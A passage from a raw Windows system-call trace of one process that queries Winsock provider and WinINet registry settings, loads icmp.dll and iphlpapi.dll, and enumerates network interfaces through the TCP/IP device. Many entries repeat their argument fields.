144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) }, 98, ) == 0x0 02696 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) }, 98, ) == 0x0 02697 896 NtQueryValueKey (228, (228, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data=":$Bf\250;\246J\272\245.\13\327\37\335\203"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (228, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data=":$Bf\250;\246J\272\245.\13\327\37\335\203"}, 28, ) }, 28, ) == 0x0 02698 896 NtQueryValueKey (228, (228, "AddressFamily", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02699 896 NtQueryValueKey (228, (228, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\17\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\17\0\0\0"}, 16, ) }, 16, ) == 0x0 02700 896 NtQueryValueKey (228, (228, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 02701 896 NtQueryValueKey (228, (228, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02702 896 NtQueryValueKey (228, (228, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02703 896 NtClose (228, ... ) == 0x0 02704 896 NtOpenKey (0x20019, {24, 224, 0x40, 0, 0, (0x20019, {24, 224, 0x40, 0, 0, "000000000004"}, ... 228, ) }, ... 228, ) == 0x0 02705 896 NtQueryValueKey (228, (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0w\0s\0h\0b\0t\0h\0.\0d\0l\0l\0\0\0"}, 78, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0w\0s\0h\0b\0t\0h\0.\0d\0l\0l\0\0\0"}, 78, ) }, 78, ) == 0x0 02706 896 NtQueryValueKey (228, (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0w\0s\0h\0b\0t\0h\0.\0d\0l\0l\0\0\0"}, 78, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0w\0s\0h\0b\0t\0h\0.\0d\0l\0l\0\0\0"}, 78, ) }, 78, ) == 0x0 02707 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) }, 52, ) == 0x0 02708 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) }, 52, ) == 0x0 02709 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) }, 52, ) == 0x0 02710 896 NtQueryValueKey (228, (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (228, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) }, 52, ) == 0x0 02711 896 NtQueryValueKey (228, (228, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="\340c\252\6`}\377A\257\262>\346\322\3319-"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (228, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="\340c\252\6`}\377A\257\262>\346\322\3319-"}, 28, ) }, 28, ) == 0x0 02712 896 NtQueryValueKey (228, (228, "AddressFamily", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02713 896 NtQueryValueKey (228, (228, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\20\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\20\0\0\0"}, 16, ) }, 16, ) == 0x0 02714 896 NtQueryValueKey (228, (228, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 02715 896 NtQueryValueKey (228, (228, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02716 896 NtQueryValueKey (228, (228, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (228, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02717 896 NtClose (228, ... ) == 0x0 02718 896 NtClose (224, ... ) == 0x0 02719 896 NtWaitForSingleObject (216, 0, {0, 0}, ... ) == 0x102 02720 896 NtClose (204, ... ) == 0x0 02721 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 02722 896 NtQuerySystemInformation (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0 02723 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "System\CurrentControlSet\Services\Winsock2\Parameters"}, ... 204, ) }, ... 204, ) == 0x0 02724 896 NtQueryValueKey (204, (204, "Ws2_32NumHandleBuckets", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02725 896 NtClose (204, ... ) == 0x0 02726 896 NtDuplicateObject (-1, -2, -1, 0x0, 0, 2, ... 204, ) == 0x0 02727 896 NtCreateEvent (0x1f0003, 0x0, 1, 1, ... 224, ) == 0x0 02728 896 NtQueryValueKey (52, (52, "GlobalUserOffline", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (52, "GlobalUserOffline", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02729 896 NtWaitForSingleObject (156, 0, 0x0, ... ) == 0x0 02730 896 NtReleaseMutant (156, ... 0x0, ) == 0x0 02731 896 NtOpenMutant (0x100000, {24, 48, 0x0, 0, 0, (0x100000, {24, 48, 0x0, 0, 0, "Local\WininetConnectionMutex"}, ... 228, ) }, ... 228, ) == 0x0 02732 896 NtOpenMutant (0x100000, {24, 48, 0x0, 0, 0, (0x100000, {24, 48, 0x0, 0, 0, "Local\WininetProxyRegistryMutex"}, ... 232, ) }, ... 232, ) == 0x0 02733 896 NtCreateEvent (0x1f0003, 0x0, 0, 1, ... 236, ) == 0x0 02734 896 NtQueryValueKey (52, (52, "EnableAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (52, "EnableAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 02735 896 NtQueryValueKey (52, (52, "NoNetAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (52, "NoNetAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 02736 896 NtCreateEvent (0x1f0003, 0x0, 1, 0, ... 240, ) == 0x0 02737 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 244, ) }, ... 244, ) == 0x0 02738 896 NtQueryValueKey (244, (244, "UrlEncoding", Partial, 144, ... TitleIdx=0, Type=1, Data="0\0x\00\00\00\00\00\00\00\00\0\0\0"}, 34, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (244, "UrlEncoding", Partial, 144, ... TitleIdx=0, Type=1, Data="0\0x\00\00\00\00\00\00\00\00\0\0\0"}, 34, ) }, 34, ) == 0x0 02739 896 NtQueryValueKey (244, (244, "UrlEncoding", Partial, 144, ... TitleIdx=0, Type=1, Data="0\0x\00\00\00\00\00\00\00\00\0\0\0"}, 34, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (244, "UrlEncoding", Partial, 144, ... TitleIdx=0, Type=1, Data="0\0x\00\00\00\00\00\00\00\00\0\0\0"}, 34, ) }, 34, ) == 0x0 02740 896 NtClose (244, ... ) == 0x0 02741 896 NtQueryValueKey (52, (52, "TruncateFileName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02742 896 NtAllocateVirtualMemory (-1, 1388544, 0, 4096, 4096, 4, ... 1388544, 4096, ) == 0x0 02743 896 NtQueryValueKey (52, (52, "BadProxyExpiresTime", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02744 896 NtCreateEvent (0x1f0003, 0x0, 1, 1, ... 244, ) == 0x0 02745 896 NtWaitForSingleObject (244, 0, 0x0, ... ) == 0x0 02746 896 NtClearEvent (244, ... ) == 0x0 02747 896 NtSetEvent (244, ... 0x0, ) == 0x0 02748 896 NtClearEvent (224, ... ) == 0x0 02749 896 NtSetEvent (224, ... 0x0, ) == 0x0 02750 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "icmp.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02751 896 NtAllocateVirtualMemory (-1, 1392640, 0, 4096, 4096, 4, ... 1392640, 4096, ) == 0x0 02752 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\icmp.dll"}, 1239772, ... ) }, 1239772, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02753 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\icmp.dll"}, 1239772, ... ) }, 1239772, ... ) == 0x0 02754 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\icmp.dll"}, 5, 96, ... 248, {status=0x0, info=1}, ) }, 5, 96, ... 248, {status=0x0, info=1}, ) == 0x0 02755 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 248, ... 252, ) == 0x0 02756 896 NtQuerySection (252, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 02757 896 NtClose (248, ... ) == 0x0 02758 896 NtMapViewOfSection (252, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x74290000), 0x0, 16384, ) == 0x0 02759 896 NtClose (252, ... ) == 0x0 02760 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "iphlpapi.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02761 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\iphlpapi.dll"}, 1240536, ... ) }, 1240536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02762 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\iphlpapi.dll"}, 1240536, ... ) }, 1240536, ... ) == 0x0 02763 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\iphlpapi.dll"}, 5, 96, ... 252, {status=0x0, info=1}, ) }, 5, 96, ... 252, {status=0x0, info=1}, ) == 0x0 02764 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 252, ... 248, ) == 0x0 02765 896 NtQuerySection (248, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 02766 896 NtClose (252, ... ) == 0x0 02767 896 NtMapViewOfSection (248, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76d60000), 0x0, 102400, ) == 0x0 02768 896 NtClose (248, ... ) == 0x0 02769 896 NtProtectVirtualMemory (-1, (0x76d61000), 500, 4, ... (0x76d61000), 4096, 32, ) == 0x0 02770 896 NtProtectVirtualMemory (-1, (0x76d61000), 4096, 32, ... (0x76d61000), 4096, 4, ) == 0x0 02771 896 NtFlushInstructionCache (-1, 1993740288, 500, ... ) == 0x0 02772 896 NtProtectVirtualMemory (-1, (0x76d61000), 500, 4, ... (0x76d61000), 4096, 32, ) == 0x0 02773 896 NtProtectVirtualMemory (-1, (0x76d61000), 4096, 32, ... (0x76d61000), 4096, 4, ) == 0x0 02774 896 NtFlushInstructionCache (-1, 1993740288, 500, ... ) == 0x0 02775 896 NtProtectVirtualMemory (-1, (0x76d61000), 500, 4, ... (0x76d61000), 4096, 32, ) == 0x0 02776 896 NtProtectVirtualMemory (-1, (0x76d61000), 4096, 32, ... (0x76d61000), 4096, 4, ) == 0x0 02777 896 NtFlushInstructionCache (-1, 1993740288, 500, ... ) == 0x0 02778 896 NtProtectVirtualMemory (-1, (0x76d61000), 500, 4, ... (0x76d61000), 4096, 32, ) == 0x0 02779 896 NtProtectVirtualMemory (-1, (0x76d61000), 4096, 32, ... (0x76d61000), 4096, 4, ) == 0x0 02780 896 NtFlushInstructionCache (-1, 1993740288, 500, ... ) == 0x0 02781 896 NtProtectVirtualMemory (-1, (0x76d61000), 500, 4, ... (0x76d61000), 4096, 32, ) == 0x0 02782 896 NtProtectVirtualMemory (-1, (0x76d61000), 4096, 32, ... (0x76d61000), 4096, 4, ) == 0x0 02783 896 NtFlushInstructionCache (-1, 1993740288, 500, ... ) == 0x0 02784 896 NtProtectVirtualMemory (-1, (0x76d61000), 500, 4, ... (0x76d61000), 4096, 32, ) == 0x0 02785 896 NtProtectVirtualMemory (-1, (0x76d61000), 4096, 32, ... (0x76d61000), 4096, 4, ) == 0x0 02786 896 NtFlushInstructionCache (-1, 1993740288, 500, ... ) == 0x0 02787 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iphlpapi.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02788 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 02789 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14090240, 65536, ) == 0x0 02790 896 NtAllocateVirtualMemory (-1, 14090240, 0, 4096, 4096, 4, ... 14090240, 4096, ) == 0x0 02791 896 NtAllocateVirtualMemory (-1, 14094336, 0, 8192, 4096, 4, ... 14094336, 8192, ) == 0x0 02792 896 NtCreateFile (0x20000000, {24, 0, 0x40, 0, 0, (0x20000000, {24, 0, 0x40, 0, 0, "\Device\Tcp"}, 0x0, 128, 3, 3, 0, 0, 0, ... 248, {status=0x0, info=0}, ) }, 0x0, 128, 3, 3, 0, 0, 0, ... 248, {status=0x0, info=0}, ) == 0x0 02793 896 NtCreateFile (0x40000000, {24, 0, 0x40, 0, 0, (0x40000000, {24, 0, 0x40, 0, 0, "\Device\Tcp"}, 0x0, 128, 3, 3, 0, 0, 0, ... 252, {status=0x0, info=0}, ) }, 0x0, 128, 3, 3, 0, 0, 0, ... 252, {status=0x0, info=0}, ) == 0x0 02794 896 NtCreateFile (0x20000000, {24, 0, 0x40, 0, 0, (0x20000000, {24, 0, 0x40, 0, 0, "\Device\Ip"}, 0x0, 128, 3, 3, 0, 0, 0, ... 256, {status=0x0, info=0}, ) }, 0x0, 128, 3, 3, 0, 0, 0, ... 256, {status=0x0, info=0}, ) == 0x0 02795 896 NtCreateFile (0x100003, {24, 0, 0x40, 0, 0, (0x100003, {24, 0, 0x40, 0, 0, "\Device\Ip"}, 0x0, 128, 3, 3, 0, 0, 0, ... 260, {status=0x0, info=0}, ) }, 0x0, 128, 3, 3, 0, 0, 0, ... 260, {status=0x0, info=0}, ) == 0x0 02796 896 NtCreateFile (0x20100080, {24, 0, 0x40, 0, 1241260, (0x20100080, {24, 0, 0x40, 0, 1241260, "\??\Ip"}, 0x0, 128, 3, 1, 64, 0, 0, ... 264, {status=0x0, info=0}, ) }, 0x0, 128, 3, 1, 64, 0, 0, ... 264, {status=0x0, info=0}, ) == 0x0 02797 896 NtAllocateVirtualMemory (-1, 14102528, 0, 36864, 4096, 4, ... 14102528, 36864, ) == 0x0 02798 896 NtCreateEvent (0x1f0003, 0x0, 0, 0, ... 268, ) == 0x0 02799 896 NtDeviceIoControlFile (248, 268, 0x0, 0x0, 0x120003, (248, 268, 0x0, 0x0, 0x120003, "\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 32768, ... {status=0x0, info=56}, "\0\4\0\0\0\0\0\0\1\4\0\0\0\0\0\0\1\3\0\0\0\0\0\0\200\3\0\0\0\0\0\0\0\2\0\0\0\0\0\0\200\2\0\0\0\0\0\0\0\2\0\0\1\0\0\0", ) , 36, 32768, ... {status=0x0, info=56}, (248, 268, 0x0, 0x0, 0x120003, "\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 32768, ... {status=0x0, info=56}, "\0\4\0\0\0\0\0\0\1\4\0\0\0\0\0\0\1\3\0\0\0\0\0\0\200\3\0\0\0\0\0\0\0\2\0\0\0\0\0\0\200\2\0\0\0\0\0\0\0\2\0\0\1\0\0\0", ) , ) == 0x0 02800 896 NtClose (268, ... ) == 0x0 02801 896 NtCreateEvent (0x1f0003, 0x0, 0, 0, ... 268, ) == 0x0 02802 896 NtDeviceIoControlFile (248, 268, 0x0, 0x0, 0x120003, (248, 268, 0x0, 0x0, 0x120003, "\0\2\0\0\0\0\0\0\0\2\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 348, ... {status=0x0, info=118}, "\1\0\0\0\30\0\0\0\360\5\0\0\200\226\230\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\5\0\0\0\365@\250\25(\5\0\0\13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\5\0\0\13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0MS TCP Loopback interface\0", ) , 36, 348, ... {status=0x0, info=118}, (248, 268, 0x0, 0x0, 0x120003, "\0\2\0\0\0\0\0\0\0\2\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 348, ... {status=0x0, info=118}, "\1\0\0\0\30\0\0\0\360\5\0\0\200\226\230\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\5\0\0\0\365@\250\25(\5\0\0\13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\5\0\0\13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0MS TCP Loopback interface\0", ) , ) == 0x0 02803 896 NtClose (268, ... ) == 0x0 02804 896 NtCreateEvent (0x1f0003, 0x0, 0, 0, ... 268, ) == 0x0 02805 896 NtDeviceIoControlFile (248, 268, 0x0, 0x0, 0x120003, (248, 268, 0x0, 0x0, 0x120003, "\0\2\0\0\1\0\0\0\0\2\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 348, ... {status=0x0, info=158}, "\3\0\1\0\6\0\0\0\334\5\0\0\0\312\232;\6\0\0\0\0\14)\271\233\363j\201\1\0\0\0\5\0\0\0\232A\250\25\230\355\243\6J\206\1\0\327\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0}\322l\0\202\222\0\0\357\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0B\0\0\0AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport\0", ) , 36, 348, ... {status=0x0, info=158}, (248, 268, 0x0, 0x0, 0x120003, "\0\2\0\0\1\0\0\0\0\2\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 348, ... {status=0x0, info=158}, "\3\0\1\0\6\0\0\0\334\5\0\0\0\312\232;\6\0\0\0\0\14)\271\233\363j\201\1\0\0\0\5\0\0\0\232A\250\25\230\355\243\6J\206\1\0\327\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0}\322l\0\202\222\0\0\357\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0B\0\0\0AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport\0", ) , ) == 0x0 02806 896 NtClose (268, ... ) == 0x0 02807 896 NtCreateEvent (0x1f0003, 0x0, 0, 0, ... 268, ) == 0x0 02808 896 NtDeviceIoControlFile (248, 268, 0x0, 0x0, 0x120003, (248, 268, 0x0, 0x0, 0x120003, "\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 32768, ... {status=0x0, info=56}, "\0\4\0\0\0\0\0\0\1\4\0\0\0\0\0\0\1\3\0\0\0\0\0\0\200\3\0\0\0\0\0\0\0\2\0\0\0\0\0\0\200\2\0\0\0\0\0\0\0\2\0\0\1\0\0\0", ) , 36, 32768, ... {status=0x0, info=56}, (248, 268, 0x0, 0x0, 0x120003, "\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 32768, ... {status=0x0, info=56}, "\0\4\0\0\0\0\0\0\1\4\0\0\0\0\0\0\1\3\0\0\0\0\0\0\200\3\0\0\0\0\0\0\0\2\0\0\0\0\0\0\200\2\0\0\0\0\0\0\0\2\0\0\1\0\0\0", ) , ) == 0x0 02809 896 NtClose (268, ... ) == 0x0 02810 896 NtCreateEvent (0x1f0003, 0x0, 0, 0, ... 268, ) == 0x0 02811 896 NtDeviceIoControlFile (248, 268, 0x0, 0x0, 0x120003, (248, 268, 0x0, 0x0, 0x120003, "\200\2\0\0\0\0\0\0\0\1\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 4, ... {status=0x0, info=4}, "\200\2\0\0", ) , 36, 4, ... {status=0x0, info=4}, (248, 268, 0x0, 0x0, 0x120003, "\200\2\0\0\0\0\0\0\0\1\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 4, ... {status=0x0, info=4}, "\200\2\0\0", ) , ) == 0x0 02812 896 NtClose (268, ... ) == 0x0 02813 896 NtCreateEvent (0x1f0003, 0x0, 0, 0, ... 268, ) == 0x0 02814 896 NtDeviceIoControlFile (248, 268, 0x0, 0x0, 0x120003, (248, 268, 0x0, 0x0, 0x120003, "\200\2\0\0\0\0\0\0\0\2\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 8, ... {status=0x0, info=8}, "\1\0\0\0\3\0\1\0", ) , 36, 8, ... {status=0x0, info=8}, (248, 268, 0x0, 0x0, 0x120003, "\200\2\0\0\0\0\0\0\0\2\0\0\0\1\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 36, 8, ... {status=0x0, info=8}, "\1\0\0\0\3\0\1\0", ) , ) == 0x0 02815 896 NtClose (268, ... ) == 0x0 02816 896 NtCreateSemaphore (0x100003, 0x0, 0, 2147483647, ... 268, ) == 0x0 02817 896 NtCreateSemaphore (0x100003, 0x0, 0, 2147483647, ... 272, ) == 0x0 02818 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02819 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02820 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02821 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0 02822 896 NtFreeVirtualMemory (-1, (0xd80000), 0, 32768, ... (0xd80000), 65536, ) == 0x0 02823 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 14155776, 65536, ) == 0x0 02824 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0 02825 896 NtAllocateVirtualMemory (-1, 14155776, 0, 1, 4096, 4, ... 14155776, 4096, ) == 0x0 02826 896 NtQueryVirtualMemory (-1, 0xd80000, Basic, 28, ... {BaseAddress=0xd80000,AllocationBase=0xd80000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 